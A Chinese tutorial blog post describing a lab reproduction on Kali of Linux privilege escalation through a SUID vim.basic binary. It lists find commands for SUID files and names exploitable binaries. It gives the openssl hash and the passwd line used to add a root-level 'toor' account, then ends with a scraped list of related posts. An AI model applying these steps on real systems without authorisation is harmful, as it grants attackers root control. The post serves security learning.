linux suid 脚本,Linux使用suid vim.basic文件实现提权
在kali上复现
先给需要的vim.basic文件设置suid权限
chmod u+s /usr/bin/vim.basic
先adduser test1一个普通权限用户
现在就是一个合适的提权环境
通过以下命令可以找到存在suid权限的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
可用于提权的文件有
nmap
vim
find
bash
more
less
nano
cp
利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户
passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell
这边可以看看root用户的格式
root:x:0:0:root:/root:/bin/bash
(密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)
生成密码:用openssl passwd -1 –salt asd 123 (这里是-1(数字1)不是L)
直接写在passwd文件里面,
toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash
用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个
这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改
vim.basic /etc/passwd
用这个打开,然后修改文件,就可以成功保存
可以看到已经添加了,su toor切换,密码123,再id查看一下权限
root权限
chmod u+s /usr/bin/vim.basic
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持脚本之家。
linux suid 脚本,Linux使用suid vim.basic文件实现提权相关推荐
- linux利用* vim提权,Linux使用suid vim.basic文件实现提权
在kali上复现 先给需要的vim.basic文件设置suid权限 chmod u+s /usr/bin/vim.basic 先adduser test1一个普通权限用户 现在就是一个合适的提权环境 ...
- linux利用* vim提权,linux 通过suid vim.basic文件提权
在kali上复现 先给需要的vim.basic文件设置suid权限 chmod u+s /usr/bin/vim.basic 先adduser test1一个普通权限用户 现在就是一个合适的提权环境 ...
- Linux shell 脚本实现u盘挂载及文件拷贝
Linux shell 脚本实现u盘挂载及文件拷贝 对于linux系统来说.使用mount命令(需管理员模式使用)来进行挂载硬盘 对于我的虚拟机来说.在插入u盘时,使用sudo fdisk -l命令设 ...
- Linux Shell脚本 Linux C程序 获取指定的范围内 or 系统可用端口
Linux Shell脚本 && Linux C程序 获取指定的范围内 or 系统可用端口 一.源代码及其运行 1. Linux C程序getPort.c 源码 运行示例 2. 脚本文 ...
- linux y脚本,Linux中脚本的使用方法
Linux中脚本的使用方法 一.前言 关于Linux中的脚本的用法,一直没有时间去好好地总结,正好今天下雨,就好好的整理一下思路吧,其实精通了一门语言,比如C语言,学习其他语言需要的成本是非常少的,同 ...
- linux mq脚本,Linux自动化命令工具expect
expect是Unix系统中用来进行自动化控制和测试的软件工具,应用在交互式软件中如telnet,ftp,Passwd,fsck,rlogin,tip,ssh等等. 用法 Linux中我们经常写脚本处 ...
- linux连接oracle的日志,linux shell脚本连接oracle查询数据插入文件和日志文件中
#!/bin/sh sqlplus "用户名/密码@数据库"< sqlplus "用户名/密码"< sqlplus -S "用户名/密码& ...
- linux函数脚本,linux 函数_linux常用脚本和函数
摘要 腾兴网为您分享:linux常用脚本和函数,自动刷宝,英语字典,携程,享家等软件知识,以及智慧人社app,安卓终端,vdhcoapp,matebook管家,钦州智慧党建,商户号系统,税务app,济 ...
- linux vi脚本,linux下vi(vim)的新的用法总结
用了好几年的vi编辑器,但有些实用的用法还是没有用到过.今天听了python视频中关于linux介绍后,还是学了几招新的 1. :set nu 显示行号 2. gg--------到文件首 3.G-- ...
最新文章
- 0x16.基本数据结构 — Trie树(字典树)+ A C 自 动 机
- HDU 1004 Let the Balloon Rise
- 黑科技:CSS定制多行省略
- 澳洲中产收入水平[转]
- 图片跟着鼠标_刷完几百张网易云Banner,我发现了2个PPT图片处理的大招!
- 漫步数理统计十七——条件分布与期望
- 软件设计师历年真题与解析分享(05——17年)
- linux批量修改文件后缀
- 字体字号磅数大小对照表
- 小米微信双开开启谷歌服务器,小米10怎么双开微信 具体设置方法分享
- kindle的mobi格式的文件,怎么转换成txt文件供一版阅读器来使用?
- MediaWiki中的各种功能和设置
- 通过Python计算经纬度点任意角度任意距离的经纬度点
- win10桌面的计算机图标怎么删除,win10电脑桌面图标如何去掉快捷箭头。
- 17 重定向(Redirect) vs 转发(Forward)
- linux libuv,libuv queue的实现
- CSS垂直居中和水平居中
- 爱帮网遭江苏移动侵权 源自爱帮机器人
- 阿里怎么发工资?自研薪酬管理系统首次曝光
- 西邮Linux小组22-20纳新面试题目及题解